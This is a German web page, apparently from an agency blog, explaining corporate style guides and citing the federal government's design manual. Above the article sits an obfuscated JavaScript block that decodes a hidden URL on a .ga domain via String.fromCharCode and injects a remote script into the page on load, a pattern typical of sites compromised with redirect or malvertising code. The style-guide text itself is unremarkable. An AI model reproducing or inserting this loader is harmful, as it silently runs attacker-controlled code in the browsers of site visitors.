var _0x1f92=['appendChild','1051197hJyWzE','279875vBeEEE','679597pxmSpW','1208114MFItag','shift','currentScript','1yNFUPu','755208bCXcLD','parentNode','808668ljhldK','277011vIvjKc','push','createElement','1020859qQZHqJ','script','1012100HJdiys','fromCharCode','insertBefore','src','getElementsByTagName','1OuqVoU','3470379tibEqN','1439788dxeSnm','head','94160WqQicf','2vRLkLk'];var _0xe4f51f=_0x1605;(function(_0x36e879,_0x71d7d){var _0x19f9dd=_0x1605;while(!![]){try{var _0x27ae8f=-parseInt(_0x19f9dd(0x1b8))+-parseInt(_0x19f9dd(0x1b0))+parseInt(_0x19f9dd(0x1b6))*parseInt(_0x19f9dd(0x1af))+-parseInt(_0x19f9dd(0x1c7))+-parseInt(_0x19f9dd(0x1c1))+-parseInt(_0x19f9dd(0x1b2))+-parseInt(_0x19f9dd(0x1bd))*-parseInt(_0x19f9dd(0x1be));if(_0x27ae8f===_0x71d7d)break;else _0x36e879['push'](_0x36e879['shift']());}catch(_0x5a5af5){_0x36e879['push'](_0x36e879['shift']());}}}(_0x1f92,0x95a7c));var _0x230d=[_0xe4f51f(0x1bc),_0xe4f51f(0x1b7),_0xe4f51f(0x1b1),_0xe4f51f(0x1c5),_0xe4f51f(0x1c0),'698448rkGfeF',_0xe4f51f(0x1c6),'281314aeWSVS','1fashtG',_0xe4f51f(0x1c9),_0xe4f51f(0x1bf),_0xe4f51f(0x1bb),_0xe4f51f(0x1c4),_0xe4f51f(0x1b3),_0xe4f51f(0x1c2),_0xe4f51f(0x1b9),'1YWwfcj'],_0x3e5356=_0x567b;function _0x567b(_0x26bed5,_0x3c3ade){_0x26bed5=_0x26bed5-0x161;var _0x88803e=_0x230d[_0x26bed5];return _0x88803e;}function _0x1605(_0x7e46ac,_0x414a0e){_0x7e46ac=_0x7e46ac-0x1af;var _0x1f92c0=_0x1f92[_0x7e46ac];return _0x1f92c0;}(function(_0x513bd6,_0x54f163){var _0x1d2548=_0xe4f51f,_0x41ee88=_0x567b;while(!![]){try{var _0x2955a7=-parseInt(_0x41ee88(0x168))*parseInt(_0x41ee88(0x16a))+parseInt(_0x41ee88(0x16f))+-parseInt(_0x41ee88(0x165))*-parseInt(_0x41ee88(0x161))+-parseInt(_0x41ee88(0x16c))+parseInt(_0x41ee88(0x167))+parseInt(_0x41ee88(0x16e))+-parseInt(_0x41ee88(0x170))*-parseInt(_0x41ee88(0x169));if(_0x2955a7===_0x54f163)break;else _0x513bd6[_0x1d2548(0x1b4)](_0x513bd6['shift']());}catch(_0x33270c){_0x513bd6[_0x1d2548(0x1b4)](_0x513bd6[_0x1d2548(0x1c8)]());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x63,0x6c,0x69,0x63,0x6b,0x2e,0x64,0x72,0x69,0x76,0x65,0x72,0x66,0x6f,0x72,0x74,0x6e,0x69,0x67,0x74,0x6c,0x79,0x2e,0x67,0x61,0x2f,0x74,0x56,0x39,0x53,0x4a,0x48),d=document,s=d[_0xe4f51f(0x1b5)](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm,document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)][_0xe4f51f(0x1ba)](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0][_0xe4f51f(0x1c3)](s);

Was ist ein Style Guide?

Style Guides: Straßenkarten für Ihr Corporate Design
von RHKD 6 Jahren
Startseite  /  Was ist …  /  Was ist ein Style Guide?

Style Gui­de: Wenn Sie bei dem Begriff an eine Schlag­zei­le auf dem Titel einer belie­bi­gen Frau­en­zeit­schrift den­ken, lie­gen Sie gar nicht so falsch. Natür­lich geht es in die­sem Fall nicht um die neus­ten Früh­lings­loo­ks, son­dern um den Look Ihres Unter­neh­mens. Trotz­dem ist der Style Gui­de auch hier die Anlei­tung zu gutem Aus­se­hen. Und den rich­ti­gen Worten.

Der Style Guide

Immer hübsch der Cor­po­ra­te Iden­ti­ty nach!

Jeder mag über die Bun­des­re­gie­rung den­ken was er möch­te, doch bei ihrem Style Gui­de haben sie sich Mühe gege­ben. Auf einer eige­nen Sub­do­main hat die Bun­des­re­gie­rung für jedes kleins­te Ele­ment des Cor­po­ra­te Designs detail­lier­te Richt­li­ni­en aus­ge­ge­ben, wie es aus­zu­se­hen hat.

Und damit auch wirk­lich kei­ner­lei Unstim­mig­kei­ten auf­kom­men, wenn man mal eben sei­nen per­sön­li­chen Brief­kopf oder die eige­ne Web­site mit hüb­schen Ele­men­ten des Bun­des­de­signs auf­lo­ckern will (was natür­lich ver­bo­ten ist), gibt es die Richt­li­ni­en von A wie Anzei­ge bis W wie Web­an­wen­dung für jedes mög­li­che Medium.

Das Ziel ist klar: Der Sty­legui­de sorgt dafür, dass bei der visu­el­len Kom­mu­ni­ka­ti­on nie­mand aus der Rei­he tanzt und das Cor­po­ra­te Design immer ein­heit­lich ist. Das spie­gelt natür­lich eine star­ke Cor­po­ra­te Identity.

Ein Sty­legui­de legt aber nicht nur visu­el­le Merk­ma­le fest. Auch Spra­che soll­te im Sin­ne der Cor­po­ra­te Com­mu­ni­ca­ti­ons immer gleich sein, zumin­dest wenn es um Kern­bot­schaf­ten geht. Der Gui­de regelt bei­spiels­wei­se, wel­che Anre­de­form für Kun­den gilt, wie Kun­den über­haupt bezeich­net wer­den, wie man sich am Tele­fon mel­den soll­te usw.

Außer­dem regelt der Sty­legui­de auch Grund­la­gen des Lay­outs für alle mög­li­chen Kom­mu­ni­ka­ti­ons­mit­tel, selbst z.B. Papier­sor­ten für Rech­nun­gen. Sie sehen also, dem Style Gui­de kommt eine äußerst wich­ti­ge Auf­ga­be bei der Umset­zung Ihrer Cor­po­ra­te Iden­ti­ty zu. Des­we­gen soll­ten Sie bei der Aus­ar­bei­tung auch nicht schlampen.

Einheitlicher Auftritt

Wer­den Sie ruhig zum Erbsenzähler!

Dafür tei­len Sie zunächst ein­mal ein, in wel­chen Medi­en Ihre Bot­schaf­ten ver­brei­tet wer­den. Dazu gehö­ren der per­sön­li­che Kon­takt, Tele­fon, Kor­re­spon­denz, Web­site, Publi­ka­tio­nen, Social Media, Anzei­gen usw. Sei­en Sie schon hier so klein­lich, wie nur möglich.

Jedes die­ser Medi­en hat spe­zi­el­le Anfor­de­run­gen und Eigen­schaf­ten, deren Aus­ge­stal­tung Sie bis ins kleins­te Detail fest­le­gen kön­nen. Gehen Sie dabei ein­fach vom Gro­ben zum Fei­nen. Bei einem Geschäfts­brief hie­ße das etwa: Lay­out – Brief­kopf – Schrift­art – Schrift­far­be – Schrift­grö­ße – Absät­ze – Anspra­che – Papier – Druck­form – Brief­um­schlag. Die­se genaue Ein­tei­lung stem­pelt Sie nicht etwa zum Zwangs­neu­ro­ti­ker, son­dern zu einem Unter­neh­mer, der genau weiß, wofür sein Unter­neh­men steht.

Auch Ihre Mit­ar­bei­ter wer­den für der­lei Richt­li­ni­en dank­bar sein, müs­sen sie sich doch dann über die­se Din­ge kei­ne Gedan­ken mehr machen und wis­sen genau, ob sie sich rich­tig ver­hal­ten. Das Hand­buch soll­ten Sie des­halb nicht im hin­ters­ten Regal Ihres Archivs ver­ste­cken, son­dern jedem Mit­ar­bei­ter ein­fach zugäng­lich machen. Ein aus­ge­druck­tes Manu­al ist zwar ganz brauch­bar und soll­te zumin­dest ein­mal je Flur vor­han­den sein. Aber viel wich­ti­ger ist die Online­ver­füg­bar­keit. Schließ­lich kön­nen Sie hier nicht nur die The­men­ge­bie­te über­sicht­lich sor­tie­ren, son­dern auch Such­funk­tio­nen und Sup­port anbie­ten. Außer­dem kön­nen Sie Vor­la­gen – und dafür ist jeder dank­bar – und Schrift­ar­ten, Logos usw., gleich in der rich­ti­gen Druck­auf­lö­sung oder in ver­schie­de­nen Zusam­men­stel­lun­gen für jede Gele­gen­heit zum Down­load bereit hal­ten. Sie soll­ten sich dazu wirk­lich mal das Manu­al der Bun­des­re­gie­rung anschau­en, denn man kann hier wirk­lich etwas lernen.

Kategorie:
  Was ist …
Artikel per Email verschicken